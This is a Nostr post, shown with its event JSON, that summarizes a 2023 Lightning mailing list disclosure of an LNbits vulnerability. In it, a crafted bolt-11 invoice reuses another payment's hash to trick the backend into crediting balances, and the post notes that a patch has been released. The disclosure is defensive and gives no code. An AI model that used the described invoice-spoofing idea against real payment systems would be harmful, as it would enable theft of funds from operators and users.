Conversation Details on Nostr: 📝 Summary: LNbits found an exploit that lets attackers create balances by ...
📝 Summary: LNbits found an exploit that lets attackers create balances by manipulating invoices. The attacker can use a payment hash from one payment to create a malicious invoice that tricks the system into thinking it’s a different payment. Developers can prevent this by using additional checks. A patch has been released.
👥 Authors:
• Antoine Riard ( Antoine Riard [ARCHIVE] (npub1vjz…x8dd) )
• callebtc ( callebtc [ARCHIVE] (npub1wlh…90xk) )
📅 Messages Date: 2023-06-19
✉️ Message Count: 2
📚 Total Characters in Messages: 6791
Messages Summaries
✉️ Message by callebtc on 19/06/2023:
LNbits discovered an exploit that allows attackers to create balances out of thin air by abusing a quirk in how invoices are handled internally. The attacker can insert a bolt-11 payment hash of payment A into a different payment, creating a malicious invoice B that can trick the backend into believing that B == A. The mitigation is simple, and developers should use additional checks to ensure that the invoice details have not been messed around with. The attack requires a fundamental understanding of bolt-11 and custom tooling to produce the malicious invoice.
✉️ Message by Antoine Riard on 19/06/2023:
LNbits discovered an exploit allowing attackers to create balances by abusing a quirk in how invoices are handled internally, which may affect other Lightning applications. A patch has been released.
Follow Lightning Mailing List (npub1j3t…4gll) for full threads
Published at
2023-06-20 11:15:34Event JSON
{
"id": "c10991f40a065e07ba2c8ebc816d67255bc2349568023672210a477548677146",
"pubkey": "57fe4c4ae74215fb92bd0dcb8a7787c5e907db74e987f30f1acaaad9c3a0271f",
"created_at": 1687259734,
"kind": 30023,
"tags": [
[
"d",
"5c152f85-028a-4571-85dc-3a0d078bb9a8"
],
[
"title",
"Conversation Details"
],
[
"image",
"https://nostr.build/i/dbc5bd7993c8d036431edeefea63a2b3b796e1f49baf96bf6b09e13c8c662833.jpg"
],
[
"p",
"6485bc56963b51c9043d0855cca9f78fcbd0ce135a195c3f969e18ca54a0d551"
],
[
"p",
"77eeb5bdaa4549cf07ee002a39b9236f4ede78df640eca7b11571eecf46f61d6"
],
[
"p",
"9456f7acb763eaab2e02bd8e60cf17df74f352c2ae579dce1f1dd25c95dd611c"
]
],
"content": "📝 Summary: LNbits found an exploit that lets attackers create balances by manipulating invoices. The attacker can use a payment hash from one payment to create a malicious invoice that tricks the system into thinking it's a different payment. Developers can prevent this by using additional checks. A patch has been released.\n\n👥 Authors: \n• Antoine Riard ( nostr:npub1vjzmc45k8dgujppapp2ue20h3l9apnsntgv4c0ukncvv549q64gsz4x8dd )\n• callebtc ( nostr:npub1wlhtt0d2g4yu7plwqq4rnwfrda8du7xlvs8v57c32u0wear0v8tq6h90xk )\n\n📅 Messages Date: 2023-06-19\n\n✉️ Message Count: 2\n\n📚 Total Characters in Messages: 6791\n\n## Messages Summaries\n\n✉️ Message by callebtc on 19/06/2023:\nLNbits discovered an exploit that allows attackers to create balances out of thin air by abusing a quirk in how invoices are handled internally. The attacker can insert a bolt-11 payment hash of payment A into a different payment, creating a malicious invoice B that can trick the backend into believing that B == A. The mitigation is simple, and developers should use additional checks to ensure that the invoice details have not been messed around with. The attack requires a fundamental understanding of bolt-11 and custom tooling to produce the malicious invoice.\n\n✉️ Message by Antoine Riard on 19/06/2023:\nLNbits discovered an exploit allowing attackers to create balances by abusing a quirk in how invoices are handled internally, which may affect other Lightning applications. A patch has been released.\n\n\nFollow nostr:npub1j3t00t9hv042ktszhk8xpnchma60x5kz4etemnslrhf9e9wavywqf94gll for full threads",
"sig": "dfd03621289a0b9c0d698c716ec0cdf23b9be51be3d5c5b53aab3e6076eff44afbae75b1faf53178dfb2b267fe3b270ed30545a925472e930013b3a12f9c1f79"
}